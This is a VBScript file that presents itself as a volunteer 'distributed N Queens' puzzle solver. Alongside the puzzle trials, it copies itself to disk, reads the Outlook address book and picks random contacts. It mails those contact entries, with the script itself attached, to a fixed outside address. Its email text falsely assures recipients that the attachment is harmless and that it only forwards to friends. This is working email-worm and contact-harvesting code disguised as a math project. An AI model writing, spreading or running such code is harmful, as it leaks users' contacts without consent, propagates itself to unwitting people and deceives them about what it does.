'******* DISTRIBUTED N QUEENS ***********

Option Explicit

'*** DECLARE VARIABLES***
Dim iLoop
Dim aBoard()
Dim aPossible()
Dim iIndex, iPos, iTrialLoops
Dim bolValid, iXLoop, iLoop2
Dim strBody, iSuccesses, iCount
Dim objOut, objMail, objAddress, objMAPI, iListCount, _
    iEntryCount, strBodyLine
Dim objFSO, objTextStream, strFileContents
Dim aDiff, aSum
'************************

'*** DECLARE CONSTANTS ***
Const N = 50            'Let's try 50x50
Const iTrials = 250     'Let's try 100 times!
Const iRecipCount = 10  'Let's send the program to 10 folks
Const strFileName = "C:\DistNQueens.vbs"
Const strSubjectLine = "Help us Solve the N Queens Problem!"
'*************************

'***Set the mail body line***
strBodyLine = "Hello!  How would you like to help solve the N queens " & _
"problem?  If you are using Outlook and Internet Explorer 5.0 You can help! " & _
"Attached to this email you'll find a file, DistNQueens.vbs, which contains " & _
"code that will run " & iTrials & " N Queen ""trials"" on your computer.  If any of " & _
"these trials are successful, an email will be sent to ***ENTER EMAIL ADDRESS*** " & _
"reporting the success.  Once completed, this email will be sent in duplicate " & _
"to 10 randomly selected people in your Outlook Address Book!" & vbCrLf & vbCrLf & _
"If you do not wish to participate in finding solutions to the N queens problem, " & _
"simply delete this email.  The DistNQueens.vbs script is not harmful to your " & _
"computer or files; you will not loose any information by running the attachment. " & _
"Again, though, if you do not wish to do this, simply delete this email." & vbCrLf & _
vbCrLf & "If you are interested in learning more about the N queens problem, check " & _
"out these pages:" &  vbCrLf & vbCrLf & vbTab & _
"* http://quest.cc.purdue.edu/Paragon/Docs/Intel/Manuals/psug/psug_71.html" & vbCrLf & _
vbTab & "* http://www.kanadas.com/puzzles/queens.html" & vbCrLf & _
vbTab & "* ***ENTER URL HERE***" & vbCrLF & vbCrLf & _
"I hope you decide to run the attachment, helping to test 250 random solutions " & _
"to the N queens problem!  Have a great day!"
'********************************

Randomize          'Now, we need to generate a random board
iSuccesses = 0     'Initialize iSuccesses

'***Write this file to the disk***
Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objTextStream = objFSO.OpenTextFile(WScript.ScriptFullName, 1)
strFileContents = objTextStream.ReadAll
objTextStream.Close
Set objTextStream = Nothing

Set objTextStream = objFSO.CreateTextFile(strFileName)
objTextStream.Write strFileContents
objTextStream.Close
Set objTextStream = Nothing
'*********************************

'***Create the arrays***
Redim aBoard(N)
Redim aDiff(N*2)
Redim aSum(N*2)
'***********************

'***Loop for iTrial Trials***
For iTrialLoops = 1 to iTrials
  '***Create an array of acceptable values***
  Redim aPossible(N)
  For iLoop = 1 to N
    aPossible(iLoop) = iLoop
  Next 'iLoop
  '*******************************************

  '***Populate the board***
  For iLoop = 1 to N
    'Randomly pick a value between 1 and N - iLoop + 1
    iIndex = Int(Rnd*(N - iLoop + 1)) + 1
    aBoard(iLoop) = aPossible(iIndex)

    'Compact the array
    For iPos = iIndex to UBound(aPossible) - 1
       aPossible(iPos) = aPossible(iPos + 1)
    Next
    Redim Preserve aPossible(UBound(aPossible) - 1)
  Next 'iLoop
  '************************

  '***Check to see if it is a valid solution***
  '(In BIG O of N!  Thanks James!)
  bolValid = True

  For iLoop = 0 to N*2
    aDiff(iLoop) = 0
    aSum(iLoop) = 0
  Next 'iLoop

  iLoop = 1
  Do While iLoop < N AND bolValid
    'Now, check to make sure no other queens lie on the diagonal
    iCount = iLoop + aBoard(iLoop)
    If aSum(iCount) = 1 then
      bolValid = False
    Else
      aSum(iCount) = 1
    End if

    iCount = (iLoop - aBoard(iLoop)) + N
    If aDiff(iCount) = 1 then
      bolValid = False
    Else
      aDiff(iCount) = 1
    End If

    iLoop = iLoop + 1
  Loop 'iLoop
  '**********************************************

  '***Prepare email message if we found successes***
  If bolValid then
    For iLoop = 1 to N
      strBody = strBody & aBoard(iLoop) & vbCrLf
    Next 'iLoop
    strBody = strBody & "**********" & vbCrLf

    iSuccesses = iSuccesses + 1    'Increment success count
  End If
  '**************************************************
Next 'iTrialLoops

'***Prepare to send emails***
Set objOut = WScript.CreateObject("Outlook.Application")
Set objMAPI = objOut.GetNameSpace("MAPI")
'****************************

'***SEND MAIL IF SUCCESS***
If Len(strBody) > 0 then
  Set objMail = objOut.CreateItem(0)
  objMail.Recipients.Add("mitchell@umr.edu")
  objMail.Subject = "DISTNQUEENRSLTS(N=" & N & ")"
  objMail.Body = strBody
  objMail.Attachments.Add(strFileName)
  objMail.Send
  Set objMail = Nothing
End If
'***************************

'***Send email to iRecipCount people***
iListCount = objMAPI.AddressLists.Count
ReDim aPossible(iListCount)

For iLoop = 1 to iListCount
  Set aPossible(iLoop) = objMAPI.AddressLists(iLoop).AddressEntries
Next 'iLoop

strBody = ""
iCount = 0

Set objMail = objOut.CreateItem(0)
Do While iCount < iRecipCount
  iLoop = Int(Rnd*iListCount) + 1
  iEntryCount = aPossible(iLoop).Count
  iLoop2 = Int(Rnd*iEntryCount) + 1

  objMail.Recipients.Add("mitchell@umr.edu")
  strBody = strBody & aPossible(iLoop)(iLoop2)

  iCount = iCount + 1
Loop

objMail.Subject = strSubjectLine
objMail.Body = strBody & vbCrLf & strBodyLine
objMail.Attachments.Add(strFileName)
objMail.Importance = 0
objMail.Send
Set objMail = Nothing
'**************************************

msgbox strBody & " - " & iSuccesses

'***Clean up***
'Delete the temp file we created (strFileName)
objFSO.DeleteFile strFileName

Set objMail = Nothing
Set objOut = Nothing
Set objFSO = Nothing
'**************